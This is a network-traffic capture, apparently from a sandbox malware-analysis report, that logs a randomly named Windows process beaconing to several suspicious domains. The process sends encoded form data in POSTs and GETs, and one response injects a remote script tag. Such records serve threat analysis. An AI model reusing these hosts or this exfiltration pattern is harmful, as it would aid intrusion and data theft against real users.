                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50021 | 162.0.213.72 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:16.683563948 CEST | 742 | OUT | POST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=C07Ov2dqVVQ4H5ykCTworKVc8uo5K0Z3DU8dE6Mnnd0guXkU2kRW9Aeggf4dlZngyKKSD8lGfE3AILA9o4ZOM6kSLJQt8KaXRpl1tjjZx5Iuuh0o+sYaK6v7bapcZgZMX79stGcMGaTKDsZyM/skDdQnowQecSHWuA8KRThlThtpL1jTz3U25ouJNErLz+fcwQ==
Oct 10, 2024 14:47:17.274939060 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:17 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        18 | 192.168.2.4 | 50022 | 162.0.213.72 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:19.223261118 CEST | 762 | OUT | POST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=C07Ov2dqVVQ4GZikOQYo66Vbleo5TkZzDUgdE758nLcgv2UU3lRW0Qeg4P5Xo5n7yKXnD5dGfEjAIOk9opZRNqkMBZQrhaaXRpl1tjHzx5AuvQEo554dUKv6capcKwZIX785tFY2GYbKDtpyPtEnaNQh1ARNKTy9ij4bWiRDTjZkHTyJiG1hroK6QDi/+9iVraOROvfU5VMtlLrbc/hai30=
                                                                                                        Oct 10, 2024 14:47:19.839344978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:19 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        19 | 192.168.2.4 | 50023 | 162.0.213.72 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:21.767229080 CEST | 10844 | OUT | POST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:22.358140945 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:22 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                        Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                                                        Oct 10, 2024 14:47:22.358328104 CEST108INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620
                                                                                                        Oct 10, 2024 14:47:22.358401060 CEST1236INData Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                                                        Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
                                                                                                        Oct 10, 2024 14:47:22.358417034 CEST1236INData Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
                                                                                                        Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
                                                                                                        Oct 10, 2024 14:47:22.363217115 CEST1236INData Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
                                                                                                        Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        20 | 192.168.2.4 | 50024 | 162.0.213.72 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:24.313371897 CEST | 483 | OUT | GET /m4qv/?Sh=P2TusARkbEgcEs+mDyMHtP9emvoSKlJZWWEgC4tjmOg8nAhT+FFe9yeelcBnkIXwjfDCMJlqRnnZfo12xo8UG7kWIL0+yfipd64llhGw+b1VwhgkmL0TKqs=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:24.927866936 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:24 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        21 | 192.168.2.4 | 50025 | 104.21.21.230 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:30.074976921 CEST | 775 | OUT | POST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=FVhkBvtLsd+c3YpJe7xYwPbeBzd7W9rHSSe4lJZq5KOL9Uiu3Ye9BktR5fKgC+dU3eEVNRFXgKV5g7j7aOFwHRAydQ7j0gBTdZVxchp60p+ZUg4K/gmLBhRD5cdFIKxMywn9graBdge18ZLxYDaWEgGx6fg4JF6gvxfdYVpu1tusTXQWntHprDQZrsWC5UHK1Q==
                                                                                                        Oct 10, 2024 14:47:30.760703087 CEST | 702 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:30 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrkouYgbFSvjyNm4ghpwvDtClIQMVGiqnIP4Ibf3zogZf0fJFZ6Ld8ghu4yZ4HZMDw7An2%2BeK7Lal2ZIyGQCHGbj%2BFN2QZZTeYrZTgE4SYTlc8MLLHkxc4dDV6wYHd%2FnIoQgJn%2B7fvYmdjhe"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b827aa7242c0-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        22 | 192.168.2.4 | 50026 | 104.21.21.230 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:32.619025946 CEST | 795 | OUT | POST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=FVhkBvtLsd+c045JZaxYn/bdNTd7ANrLSSC4lIM15YaL80Su0Ze9AktRy/K5G+dT3eJ2NVBXgKB5g+f7a/FzGBA0Uw7tqQBTdZVxch8y0pmZUzgK/EyIChRA+cdFMKwFywmagqG7djm18c3xYwCVLgG30/gnFUnwjQXcGH1Xo/edSRBM2cm+5D0q2rf20X6DuX2AAMJT3mGjBGjirZbLWTs=
                                                                                                        Oct 10, 2024 14:47:33.338337898 CEST | 700 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:33 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzRCHBFuAmixsbqmUDwArSs9qCY9i27FUN5LkJCPXcbvdLi6uMcMxY465hNXOHzZ3IE33BZ0IGk%2Bo2DutnibkEMi9AH7CBnlMGEzjIycRy%2ByGlg3Idlxk81jluvlAmfGpLrhf%2FiIhZBLYlXm"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8376dc98c87-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        23 | 192.168.2.4 | 50027 | 104.21.21.230 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        Oct 10, 2024 14:47:35.157192945 CEST | 10877 | OUT | POST /7ug6/ HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.personalcaresale.shop
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.personalcaresale.shop/7ug6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:47:36.342930079 CEST | 704 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:35 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8478dce443e-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190
Oct 10, 2024 14:47:36.345379114 CEST | 704 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:35 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8478dce443e-EWR
                                                                                                        Content-Encoding: gzip
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 190


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50028 | 104.21.21.230 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:37.703326941 CEST | 494 | OUT | GET /7ug6/?f6SpQ=_n84nZ4HGta&Sh=IXJECadondWQh91fX6gMxPrxehpEbK/sXgmpgogo4Iy+9wWP8KKNSUdB/sGHFOlG3Y0hTlB2s4BH9YC5SvgzHxgsSlTs6mELWZRATho00JDOVx4L12qgKBs= HTTP/1.1
                                                                                                        Host: www.personalcaresale.shop
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
Oct 10, 2024 14:47:38.379113913 CEST | 692 | IN | HTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:38 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I11BaVq1cCi1YXatJQfQr7AG4OXMehuzA5%2FBg2jQUM9QF5ePyWS9KogFmbsKF7Vog4OJSf%2FNnCOVfEFE7e9ei%2BpHfYDWiThrGArL4iJ5rY%2Faul4GD87aYAVvIVZrZY%2FU2Q1zppDWQAzxpDar"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d06b8573cc37d18-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50029 | 84.32.84.32 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:43.600039005 CEST | 751 | OUT | POST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=Cr0AeZ3dkZy4CrNa9PiRtrH6VZhzpXIxrRQ+nabbfvOfANOW1IG05kmNk0vA16WkjJE5wcPdparoUD+0yg1DkPSq5srjywnRvWvthpbZTpJ/AQZlVr2Ss63pgQNf8/2VU4rXUi2c7uEXMbA1Zzu2zOBm5y7Spb5nW5Gr+bV7BQvMeoK0FgVAFrGl3jQYPHZUFQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50030 | 84.32.84.32 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:46.147264957 CEST | 771 | OUT | POST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Ascii: Sh=Cr0AeZ3dkZy4DIFa4uiRrLH7WZhzn3JZrRU+nbeDfaWfDs+Wy5G06kmN2UvFx6WrjJIxwZPdpaXoUCO0zTtAr/SswMrl2wnRvWvtho/jToh/AjBlH+KRha3uqwNftP3cU4qAUm+27twXMbw1ZmOxpeBk9y6w5K4gILb70tBAfAnhbubuUR0XXriWqkZsCEkdeYaJtbP2vRKby6PvGs8sUCY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50031 | 84.32.84.32 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 14:47:48.687830925 CEST | 10853 | OUT | POST /wzoz/ HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.ainude2.cloud
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.ainude2.cloud/wzoz/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50032 | 84.32.84.32 | 80 | 5856 | C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
Timestamp | Bytes transferred | Direction | Data
